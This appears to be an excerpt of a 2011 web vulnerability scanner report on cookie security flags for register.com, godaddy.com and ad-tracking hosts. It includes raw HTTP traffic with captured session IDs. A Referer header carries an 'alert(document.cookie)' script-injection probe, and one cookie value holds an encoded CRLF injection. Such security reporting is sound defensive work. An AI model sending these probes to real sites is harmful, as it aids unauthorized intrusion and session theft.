P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=184443db25c7545d79e2025b8b0c50dd34fb6f4d2b0d40564e629da2286023f28ac38e07948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

/* SiteCatalyst code version: H.20.3.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */

var hostname = (top.location.host);
var s_account="";

switch(hostname) {

...[SNIP]...

10.77. http://www.register.com/js/thickbox.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.register.com
Path:	/js/thickbox.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTSID=BE922F8ED67410D61801BB428335AC70; Path=/; Domain=.register.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/thickbox.js HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/font41cfd%22%3balert(document.cookie)//a7bdf3e7ba5/vag-bold.ttf
Cookie: TSfd06f3=bbd4ebd43769aa5fc0b4deb47307bc5934fb6f4d2b0d40564e629da2286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:36:12 GMT
Set-Cookie: TLTSID=BE922F8ED67410D61801BB428335AC70; Path=/; Domain=.register.com
HostName: atleuapp04.galt.register.com
Last-Modified: Mon, 29 Aug 2011 07:46:12 GMT
ETag: "1256c1-254b-4aba016c57900"
Accept-Ranges: bytes
Content-Length: 9547
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: application/javascript
Set-Cookie: TSfd06f3=af2d54c7f076f956f2dbdb3dbd2252bb34fb6f4d2b0d40564e629da2286023f2bc9f06c5948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

var tb_pathToImage="/imgs/global/loadingAnimation.gif";$(document).ready(function(){tb_init('a.thickbox, area.thickbox, input.thickbox');imgLoader=new Image();imgLoader.src=tb_pathToImage;$('.thickbo
...[SNIP]...

11. Cookie without HttpOnly flag set previous next
There are 98 instances of this issue:

http://img.godaddy.com/image.aspx
http://img.godaddy.com/pageevents.aspx
http://login.dotomi.com/ucm/UCMController
http://www.cheapssls.com/
http://www.cheapssls.com/index.php
http://www.register.com/
http://www.register.com/domain/searchresults.rcmx
http://ad.yieldmanager.com/pixel
http://am.trafficmp.com/a/bpix
http://am.trafficmp.com/a/bpix
http://api.flickr.com/clientaccesspolicy.xml
http://api.twitter.com/1/statuses/user_timeline/msnewengland.json
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/r
http://bh.contextweb.com/bh/set.aspx
http://c7.zedo.com/img/bh.gif
https://cart.godaddy.com/basket.aspx
http://cf.addthis.com/red/p.json
http://cf.addthis.com/red/usync
http://community.research.microsoft.com/
http://cspix.media6degrees.com/orbserv/hbpix
http://d.adroll.com/pixel/TL4HVZJAKBDONOOUY7KOKV/GBRCJV675BABRAPIIGSPD6
http://d7.zedo.com/img/bh.gif
http://d7.zedo.com/img/bh.gif
http://ds.addthis.com/red/psi/sites/vasco.com/p.json
http://idcs.interclick.com/Segment.aspx
https://idp.godaddy.com/login.aspx
https://idp.godaddy.com/retrieveaccount.aspx
http://image2.pubmatic.com/AdServer/Pug
http://microsoftcambridge.com/Portals/0/app_v_feat.jpg
http://microsoftcambridge.com/Portals/0/portal.css
http://microsoftcambridge.com/Portals/0/rss.png
http://microsoftcambridge.com/Portals/0/search_results.png
http://microsoftcambridge.com/Portals/0/share_icons_new.png
http://microsoftcambridge.com/Portals/_default/Skins/working/skin.css
http://microsoftcambridge.com/Portals/_default/default.css
http://microsoftcambridge.com/Resources/Shared/scripts/initWidgets.js
http://microsoftcambridge.com/css/print.css
http://microsoftcambridge.com/css/styles.css
http://microsoftcambridge.com/img/working/about.png
http://microsoftcambridge.com/img/working/blog.png
http://microsoftcambridge.com/img/working/community.png
http://microsoftcambridge.com/img/working/events.png
http://microsoftcambridge.com/img/working/people.png
http://microsoftcambridge.com/img/working/teams.png
http://microsoftcambridge.com/img/working/working.png
http://microsoftcambridge.com/js/dnn.js
http://microsoftcambridge.com/js/dnn.xml.js
http://microsoftcambridge.com/js/dnn.xmlhttp.js
http://microsoftcambridge.com/js/dnncore.js
http://microsoftcambridge.com/js/jfeed.js
http://microsoftcambridge.com/js/jquery.js
http://microsoftcambridge.com/js/siteo.js
http://microsoftcambridge.com/js/twitter.min.js
http://microsoftcambridge.com/js/ui.js
https://mya.godaddy.com/
https://mya.godaddy.com/products/accountlist.aspx
http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1269119279@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom
http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom
http://pixel.adblade.com/imps.php
http://pixel.mathtag.com/event/img
http://pixel.mathtag.com/event/js
http://pixel.rubiconproject.com/tap.php
http://pixel.rubiconproject.com/tap.php
http://r.openx.net/set
http://research.microsoft.com/apps/search/search.ashx
http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php
http://segment-pixel.invitemedia.com/set_partner_uid
http://social.expression.microsoft.com/Forums/ar-SA/wpf/thread/786f2813-de28-4eda-ba14-9910ce655dc6
http://social.expression.microsoft.com/Forums/da-DK/wpf/thread/16309d89-5f65-4e49-9ce5-38f2a466a2c0
http://static.getclicky.com/js
http://t4.trackalyzer.com/trackalyze.asp
http://www.cheapssls.com/index.php
https://www.cheapssls.com/index.php
http://www.godaddy.com/Payment/payment-options.aspx
http://www.godaddy.com/affiliates/affiliate-program.aspx
http://www.godaddy.com/gdshop/offers/cross_sell.asp
http://www.godaddy.com/shared/video/videos.aspx
http://www.godaddy.com/ssl/JsonContent/GetMultiDomainsPlanList.aspx
http://www.godaddy.com/ssl/ssl-certificates.aspx
http://www.microsoft-careers.com/model/remote/remoteTrackingManager.cfc
http://www.register.com/css/basic.css
http://www.register.com/css/titan-screen.css
http://www.register.com/favicon.ico
http://www.register.com/imgs/global/btnChooseAPackage_on.gif
http://www.register.com/imgs/global/btnFindIt_on.gif
http://www.register.com/imgs/global/crtIcon.gif
http://www.register.com/imgs/global/registerLogo.gif
http://www.register.com/js/aop-attach.js
http://www.register.com/js/global.js
http://www.register.com/js/jquery-1.3.2.min.js
http://www.register.com/js/jquery-ui-1.7.1.custom.min.js
http://www.register.com/js/jquery.cookie.js
http://www.register.com/js/jquery.jcarousellite.js
http://www.register.com/js/mbox.js
http://www.register.com/js/nicejforms.js
http://www.register.com/js/s_code.js
http://www.register.com/js/thickbox.js

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

11.1. http://img.godaddy.com/image.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://img.godaddy.com
Path:	/image.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

fb_session=S_TOUCH=09/03/2011 21:49:36&pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40&V_DATE=09/03/2011 14:28:5938ba47e368c05affcb2650a6; path=/
actioncount=22804%0d%0aa0acc03b446; domain=.godaddy.com; path=/
fb_actioncount=38ba47e39a3cd44efaca8d89; path=/
app_pathway=38ba47e3b0f3e75ec51f0668; domain=.godaddy.com; path=/
visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domain=.godaddy.com; expires=Sun, 02-Sep-2012 21:49:36 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.2. http://img.godaddy.com/pageevents.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://img.godaddy.com
Path:	/pageevents.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

fb_session=S_TOUCH=09/03/2011 21:49:49&pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40&V_DATE=09/03/2011 14:28:5938ba47e368c05affcb2650a6; path=/
actioncount=22804%0d%0aa0acc03b446; domain=.godaddy.com; path=/
fb_actioncount=38ba47e39a3cd44efaca8d89; path=/
app_pathway=38ba47e3b0f3e75ec51f0668; domain=.godaddy.com; path=/
visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; domain=.godaddy.com; expires=Sun, 02-Sep-2012 21:49:50 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.3. http://login.dotomi.com/ucm/UCMController previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://login.dotomi.com
Path:	/ucm/UCMController

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

DotomiSession_2304=2_270600892638176047$230900890276886667$2054424934$1315085562782; Domain=.dotomi.com; Path=/
DotomiUser=230900890276886667$0$2054424934; Domain=.dotomi.com; Expires=Mon, 02-Sep-2013 21:32:42 GMT; Path=/
DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUFRLZ3hua1xARWZBXAICW0dLSEFdZWBcemhkUH5RIgFAaV0%3D; Domain=.dotomi.com; Expires=Mon, 02-Sep-2013 21:32:42 GMT; Path=/
DotomiRR2304=-1$4$1$-1$1$1$; Domain=.dotomi.com; Expires=Sun, 04-Sep-2011 21:32:42 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.4. http://www.cheapssls.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cheapssls.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sess_id=oimsl5irn8eq044otel7tsq8g5; expires=Sat, 17-Sep-2011 21:43:49 GMT; path=/; domain=.cheapssls.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.5. http://www.cheapssls.com/index.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cheapssls.com
Path:	/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

sess_id=tt1a563t87rk9ibbpnpq0ptvm4; expires=Sat, 17-Sep-2011 21:43:50 GMT; path=/; domain=.cheapssls.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:43:50 GMT
Location: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=tt1a563t87rk9ibbpnpq0ptvm4; expires=Sat, 17-Sep-2011 21:43:50 GMT; path=/; domain=.cheapssls.com
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:43:49 GMT
Content-Length: 181

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="https://www.cheapssls.com/index.php?dispatch=checkout.cart">here</a></body>

11.6. http://www.register.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.register.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; Path=/
TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:31:33 GMT
HostName: atleuapp02.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; Path=/
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; Path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 30110
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

11.7. http://www.register.com/domain/searchresults.rcmx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.register.com
Path:	/domain/searchresults.rcmx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=FC623F2DB25506910A73E866C7ED4DCB.janus-production; Path=/
TSfd06f3=9f156b13a4f431e8f00ccda3b691d1c601a75911468e3f0e4e629e11286023f2a5f6f62c948e24c6bb42c46baef45b0f14e6f57f2fa29a6eab649bb360ac0ec52844c82e16f670b9423cfffa60ac0ec52844c82e; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domain/searchresults.rcmx?webmetrics=null&searchOrigin=homepage&domain=xss&selectedTLDs=.com&x=0&y=0 HTTP/1.1
Host: www.register.com
Proxy-Connection: keep-alive
Referer: http://www.register.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C8693DAAD67310D60E179E16E4910D7E; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085359309; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085359309|ABID=670539051; R=rcomCookieTS&2011-09-03/17.29.19&trkid&WWW000000000W&; JSESSIONID=7F95BBDBD32D1299F06089A606E23A3A.janus-production; TSfd06f3=93c9a40203e59dca5be85097e7d9599b34fb6f4d2b0d40564e629c2f286023f2e0a1e568948e24c6bb42c46baef45b0f21d7714a2fa29a6e342aa0b760ac0ec534d0275816f670b9137171f760ac0ec534d02758; mbox=check#true#1315085461|session#1315085400638-452340#1315087261|PC#1315085400638-452340.19#1317677403; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=195431987.824255109.1315085416.1315085416.1315085416.1; __utmb=195431987.1.10.1315085416; __utmc=195431987; __utmz=195431987.1315085416.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vi=[CS]v1|27314E20051D1798-6000010600062C35[CE]

Response

11.8. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bh="b!!!#N!!!?H!!!!$=1j[w!!*l]!!!!#=.lv=!!-?2!!!!-=38n'!!-C,!!!!$=3BC@!!-O3!!!!*=38n'!!1SP!!!!#=38n,!!3O?!!!!$=3BC@!!UHs!!!!#=0>(p!!X41!!!!#=0>(p!!Zwa!!!!-=38n'!!itb!!!!%=1j[w!!pf4!!!!$=3BC@!!vRq!!!!$=1j[w!!vRr!!!!$=1j[w!!vRw!!!!$=1j[w!!vRx!!!!$=1j[w!!vRy!!!!$=1j[w!#!,g!!!!$=1j[w!#!y?!!!!#=.lv=!#%v(!!!!#=2w#K!#.dO!!!!$=2Z2#!#.g1!!!!#=.e%I!#.mL!!!!$=0bvK!#/t]!!!!$=09of!#0L2!!!!%=1Cp-!#0fU!!!!#=1j[w!#0fW!!!!#=1j[w!#2Gj!!!!$=3BC@!#2Oe!!!!#=1j[w!#2Of!!!!#=1j[w!#44f!!!!$=1j[w!#44h!!!!$=1j[w!#7(x!!!!'=38n'!#7)a!!!!%=38n'!#?dj!!!!#=/(P2!#?dk!!!!#=/(P2!#M7R!!!!#=09!!!#M7S!!!!#=1>Dd!#MTC!!!!$=1j[w!#MTH!!!!$=1j[w!#MTI!!!!$=1j[w!#MTJ!!!!$=1j[w!#N[7!!!!#=2w#K!#N[8!!!!#=09!!!#Ps:!!!!#=2[IV!#Q*T!!!!$=2Z2#!#Q,i!!!!#=2Z2#!#SCj!!!!$=2Z2#!#SCk!!!!$=2Z2#!#Sw^!!!!#=/(P2!#U5q!!!!#=09!!!#UDP!!!!$=1j[w!#YCf!!!!#=2w#K!#Ym:!!!!#=1,!r!#Ym>!!!!#=1,!r!#Z8E!!!!*=38n'!#Zgs!!!!%=38n'!#ZhT!!!!'=38n'!#[R[!!!!$=1j[w!#aG>!!!!$=2Z2#!#aP0!!!!'=/<(G!#bGa!!!!#=09!!!#bGi!!!!#=09!!!#bw^!!!!*=38n'!#fBj!!!!*=38n'!#fBk!!!!*=38n'!#fBm!!!!*=38n'!#fBn!!!!*=38n'!#fG+!!!!%=38n'!#fvy!!!!'=/<(I!#g<y!!!!%=38n'!#t>.!!!!#=1,!r!#tLr!!!!#=1+1N!#tn2!!!!$=1j[w!#trp!!!!-=38n'!#ust!!!!$=2Z2#!#usu!!!!$=2Z2#!#uw*!!!!$=1j[w!#v,W!!!!#=09!!!#v,Y!!!!#=1>Dd!#v-$!!!!#=09!!!#wW9!!!!$=2Z2#!#x?H!!!!-=38n'!#xUN!!!!$=1j[w!#yM#!!!!$=2Z2#!$#4B!!!!$=38n'!$#9a!!!!#=1D5B!$#?.!!!!#=1D5@!$#WA!!!!$=2Z2#!$$F#!!!!#=/bCH!$%'+!!!!$=/>v>!$%,!!!!!$=2Z2#!$%SB!!!!$=2Z2#!$'/Y!!!!#=09!!!$(!(!!!!-=38n'!$(!P!!!!*=38n'!$)gA!!!!#=09!!!$*a0!!!!$=2Z2#!$,0h!!!!$=2Z2#!$,jw!!!!#=2w#K!$-%:!!!!$=38n'!$0VL!!!!%=38n'!$0VM!!!!%=38n'!$1]+!!!!+=38n'!$1g/!!!!%=1D5F!$2j$!!!!$=2Z2#!$3IO!!!!*=38n'!$3y-!!!!(=2w%w!$4ou!!!!$=2Z2#!$5)A!!!!#=09!!!$5Rt!!!!#=1>Dd!$5Ru!!!!#=2w#K!$8+W!!!!%=38n'!$8>S!!!!%=1D5C!$8Js!!!!#=/(P2!$8Ju!!!!#=/(P2!$:3.!!!!#=2w#K!$<DI!!!!*=38n'!$=Gi!!!!#=0_Lo!$=p7!!!!#=2Z2#!$=p8!!!!#=2Z2#!$=s9!!!!#=3+WO!$>#M!!!!#=2Z2#!$>#N!!!!#=2Z2#!$>_#!!!!#=2Z2#!$?i5!!!!$=3BC@!$?tC!!!!#=38n'"; path=/; expires=Mon, 02-Sep-2013 14:43:58 GMT
BX=8d7n6ot73ufk2&b=4&s=8m&t=219; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1429123&id=725544&id=74894&id=547417&id=119282&t=2 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/
Cookie: bh="b!!!#I!!!?H!!!!$=1j[w!!*l]!!!!#=.lv=!!-?2!!!!-=38n'!!-O3!!!!*=38n'!!1SP!!!!#=38n,!!UHs!!!!#=0>(p!!X41!!!!#=0>(p!!Zwa!!!!-=38n'!!itb!!!!%=1j[w!!vRq!!!!$=1j[w!!vRr!!!!$=1j[w!!vRw!!!!$=1j[w!!vRx!!!!$=1j[w!!vRy!!!!$=1j[w!#!,g!!!!$=1j[w!#!y?!!!!#=.lv=!#%v(!!!!#=2w#K!#.dO!!!!$=2Z2#!#.g1!!!!#=.e%I!#.mL!!!!$=0bvK!#/t]!!!!$=09of!#0L2!!!!%=1Cp-!#0fU!!!!#=1j[w!#0fW!!!!#=1j[w!#2Oe!!!!#=1j[w!#2Of!!!!#=1j[w!#44f!!!!$=1j[w!#44h!!!!$=1j[w!#7(x!!!!'=38n'!#7)a!!!!%=38n'!#?dj!!!!#=/(P2!#?dk!!!!#=/(P2!#M7R!!!!#=09!!!#M7S!!!!#=1>Dd!#MTC!!!!$=1j[w!#MTH!!!!$=1j[w!#MTI!!!!$=1j[w!#MTJ!!!!$=1j[w!#N[7!!!!#=2w#K!#N[8!!!!#=09!!!#Ps:!!!!#=2[IV!#Q*T!!!!$=2Z2#!#Q,i!!!!#=2Z2#!#SCj!!!!$=2Z2#!#SCk!!!!$=2Z2#!#Sw^!!!!#=/(P2!#U5q!!!!#=09!!!#UDP!!!!$=1j[w!#YCf!!!!#=2w#K!#Ym:!!!!#=1,!r!#Ym>!!!!#=1,!r!#Z8E!!!!*=38n'!#Zgs!!!!%=38n'!#ZhT!!!!'=38n'!#[R[!!!!$=1j[w!#aG>!!!!$=2Z2#!#aP0!!!!'=/<(G!#bGa!!!!#=09!!!#bGi!!!!#=09!!!#bw^!!!!*=38n'!#fBj!!!!*=38n'!#fBk!!!!*=38n'!#fBm!!!!*=38n'!#fBn!!!!*=38n'!#fG+!!!!%=38n'!#fvy!!!!'=/<(I!#g<y!!!!%=38n'!#t>.!!!!#=1,!r!#tLr!!!!#=1+1N!#tn2!!!!$=1j[w!#trp!!!!-=38n'!#ust!!!!$=2Z2#!#usu!!!!$=2Z2#!#uw*!!!!$=1j[w!#v,W!!!!#=09!!!#v,Y!!!!#=1>Dd!#v-$!!!!#=09!!!#wW9!!!!$=2Z2#!#x?H!!!!-=38n'!#xUN!!!!$=1j[w!#yM#!!!!$=2Z2#!$#4B!!!!$=38n'!$#9a!!!!#=1D5B!$#?.!!!!#=1D5@!$#WA!!!!$=2Z2#!$$F#!!!!#=/bCH!$%'+!!!!$=/>v>!$%,!!!!!$=2Z2#!$%SB!!!!$=2Z2#!$'/Y!!!!#=09!!!$(!(!!!!-=38n'!$(!P!!!!*=38n'!$)gA!!!!#=09!!!$*a0!!!!$=2Z2#!$,0h!!!!$=2Z2#!$,jw!!!!#=2w#K!$-%:!!!!$=38n'!$0VL!!!!%=38n'!$0VM!!!!%=38n'!$1]+!!!!+=38n'!$1g/!!!!%=1D5F!$2j$!!!!$=2Z2#!$3IO!!!!*=38n'!$3y-!!!!(=2w%w!$4ou!!!!$=2Z2#!$5)A!!!!#=09!!!$5Rt!!!!#=1>Dd!$5Ru!!!!#=2w#K!$8+W!!!!%=38n'!$8>S!!!!%=1D5C!$8Js!!!!#=/(P2!$8Ju!!!!#=/(P2!$:3.!!!!#=2w#K!$<DI!!!!*=38n'!$=Gi!!!!#=0_Lo!$=p7!!!!#=2Z2#!$=p8!!!!#=2Z2#!$=s9!!!!#=3+WO!$>#M!!!!#=2Z2#!$>#N!!!!#=2Z2#!$>_#!!!!#=2Z2#!$?tC!!!!#=38n'"; ih="b!!!!(!->h]!!!!#=/XuQ!0eUs!!!!#=1F/L!34fN!!!!#=/b4V!34fX!!!!#=/b4X!3DVF!!!!#=1F/N"; BX=8d7n6ot73ufk2&b=4&s=8m&t=219; pv1="b!!!!#!$'!L!$5*F!$kY3!3DVF!%JP7!!!!$!?5%!'2po7!?Q8(!'RQt~~~~~~~=1F/N=3CT*!!!(["; uid=uid=1071eb2c-d4cd-11e0-892f-78e7d1f5079e&_hmacv=1&_salt=321185080&_keyid=k1&_hmac=d75501ec81bb906d515b301e794922b4d10045fa

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 14:43:58 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!#N!!!?H!!!!$=1j[w!!*l]!!!!#=.lv=!!-?2!!!!-=38n'!!-C,!!!!$=3BC@!!-O3!!!!*=38n'!!1SP!!!!#=38n,!!3O?!!!!$=3BC@!!UHs!!!!#=0>(p!!X41!!!!#=0>(p!!Zwa!!!!-=38n'!!itb!!!!%=1j[w!!pf4!!!!$=3BC@!!vRq!!!!$=1j[w!!vRr!!!!$=1j[w!!vRw!!!!$=1j[w!!vRx!!!!$=1j[w!!vRy!!!!$=1j[w!#!,g!!!!$=1j[w!#!y?!!!!#=.lv=!#%v(!!!!#=2w#K!#.dO!!!!$=2Z2#!#.g1!!!!#=.e%I!#.mL!!!!$=0bvK!#/t]!!!!$=09of!#0L2!!!!%=1Cp-!#0fU!!!!#=1j[w!#0fW!!!!#=1j[w!#2Gj!!!!$=3BC@!#2Oe!!!!#=1j[w!#2Of!!!!#=1j[w!#44f!!!!$=1j[w!#44h!!!!$=1j[w!#7(x!!!!'=38n'!#7)a!!!!%=38n'!#?dj!!!!#=/(P2!#?dk!!!!#=/(P2!#M7R!!!!#=09!!!#M7S!!!!#=1>Dd!#MTC!!!!$=1j[w!#MTH!!!!$=1j[w!#MTI!!!!$=1j[w!#MTJ!!!!$=1j[w!#N[7!!!!#=2w#K!#N[8!!!!#=09!!!#Ps:!!!!#=2[IV!#Q*T!!!!$=2Z2#!#Q,i!!!!#=2Z2#!#SCj!!!!$=2Z2#!#SCk!!!!$=2Z2#!#Sw^!!!!#=/(P2!#U5q!!!!#=09!!!#UDP!!!!$=1j[w!#YCf!!!!#=2w#K!#Ym:!!!!#=1,!r!#Ym>!!!!#=1,!r!#Z8E!!!!*=38n'!#Zgs!!!!%=38n'!#ZhT!!!!'=38n'!#[R[!!!!$=1j[w!#aG>!!!!$=2Z2#!#aP0!!!!'=/<(G!#bGa!!!!#=09!!!#bGi!!!!#=09!!!#bw^!!!!*=38n'!#fBj!!!!*=38n'!#fBk!!!!*=38n'!#fBm!!!!*=38n'!#fBn!!!!*=38n'!#fG+!!!!%=38n'!#fvy!!!!'=/<(I!#g<y!!!!%=38n'!#t>.!!!!#=1,!r!#tLr!!!!#=1+1N!#tn2!!!!$=1j[w!#trp!!!!-=38n'!#ust!!!!$=2Z2#!#usu!!!!$=2Z2#!#uw*!!!!$=1j[w!#v,W!!!!#=09!!!#v,Y!!!!#=1>Dd!#v-$!!!!#=09!!!#wW9!!!!$=2Z2#!#x?H!!!!-=38n'!#xUN!!!!$=1j[w!#yM#!!!!$=2Z2#!$#4B!!!!$=38n'!$#9a!!!!#=1D5B!$#?.!!!!#=1D5@!$#WA!!!!$=2Z2#!$$F#!!!!#=/bCH!$%'+!!!!$=/>v>!$%,!!!!!$=2Z2#!$%SB!!!!$=2Z2#!$'/Y!!!!#=09!!!$(!(!!!!-=38n'!$(!P!!!!*=38n'!$)gA!!!!#=09!!!$*a0!!!!$=2Z2#!$,0h!!!!$=2Z2#!$,jw!!!!#=2w#K!$-%:!!!!$=38n'!$0VL!!!!%=38n'!$0VM!!!!%=38n'!$1]+!!!!+=38n'!$1g/!!!!%=1D5F!$2j$!!!!$=2Z2#!$3IO!!!!*=38n'!$3y-!!!!(=2w%w!$4ou!!!!$=2Z2#!$5)A!!!!#=09!!!$5Rt!!!!#=1>Dd!$5Ru!!!!#=2w#K!$8+W!!!!%=38n'!$8>S!!!!%=1D5C!$8Js!!!!#=/(P2!$8Ju!!!!#=/(P2!$:3.!!!!#=2w#K!$<DI!!!!*=38n'!$=Gi!!!!#=0_Lo!$=p7!!!!#=2Z2#!$=p8!!!!#=2Z2#!$=s9!!!!#=3+WO!$>#M!!!!#=2Z2#!$>#N!!!!#=2Z2#!$>_#!!!!#=2Z2#!$?i5!!!!$=3BC@!$?tC!!!!#=38n'"; path=/; expires=Mon, 02-Sep-2013 14:43:58 GMT
Set-Cookie: BX=8d7n6ot73ufk2&b=4&s=8m&t=219; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Sat, 03 Sep 2011 14:43:58 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

11.9. http://am.trafficmp.com/a/bpix previous next

Summary

